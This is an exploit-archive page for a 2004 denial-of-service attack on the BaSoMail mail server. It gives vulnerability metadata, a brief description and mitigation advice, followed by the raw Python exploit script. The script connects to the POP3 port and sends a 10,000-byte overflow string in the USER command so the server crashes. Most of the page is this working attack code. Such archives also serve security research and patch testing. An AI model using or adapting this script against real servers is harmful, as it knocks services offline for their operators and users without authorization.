header-logo
Suggest Exploit
vendor:
BaSoMail
by:
muts
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: BaSoMail
Affected Version From: Not available
Affected Version To: Not available
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Not available
2004

BaSoMail Multiple Buffer Overflow DOS

This exploit targets the BaSoMail application and causes a Denial of Service (DOS) by sending a specially crafted buffer overflow payload. The vulnerability is present in the SMTP and POP3 commands of the application.

Mitigation:

The vendor should release a patch or update to fix the buffer overflow vulnerability. Users should apply the patch as soon as it becomes available. Until then, it is recommended to restrict access to the affected application from untrusted networks.
Source

Exploit-DB raw data:

#########################################################
# BaSoMail Multiple Buffer Overflow DOS		 	#
# 24 Oct 2004 - muts 					#
# Probably exploitable - However, I lack sleep!        	#
#########################################################

import struct
import socket

print "\n\n######################################################"
print "\nBaSoMail Multiple Buffer Overflow DOS"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nAlmost all the SMTP and POP3 commands are prone to BO.\n" 
print "\nFor Educational Purposes Only!\n" 
print "\n\n######################################################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Example buffer overflow 

buffer = '\x41'*10000

try:
	print "\nSending evil buffer..."
	s.connect(('192.168.1.32',110))
	s.send('USER ' + buffer + '\r\n')
	data = s.recv(1024)
	s.close()
	print "\nRun this script again, and server should crash."
except:
	print "\nCould not connect to sever!"

# milw0rm.com [2004-10-26]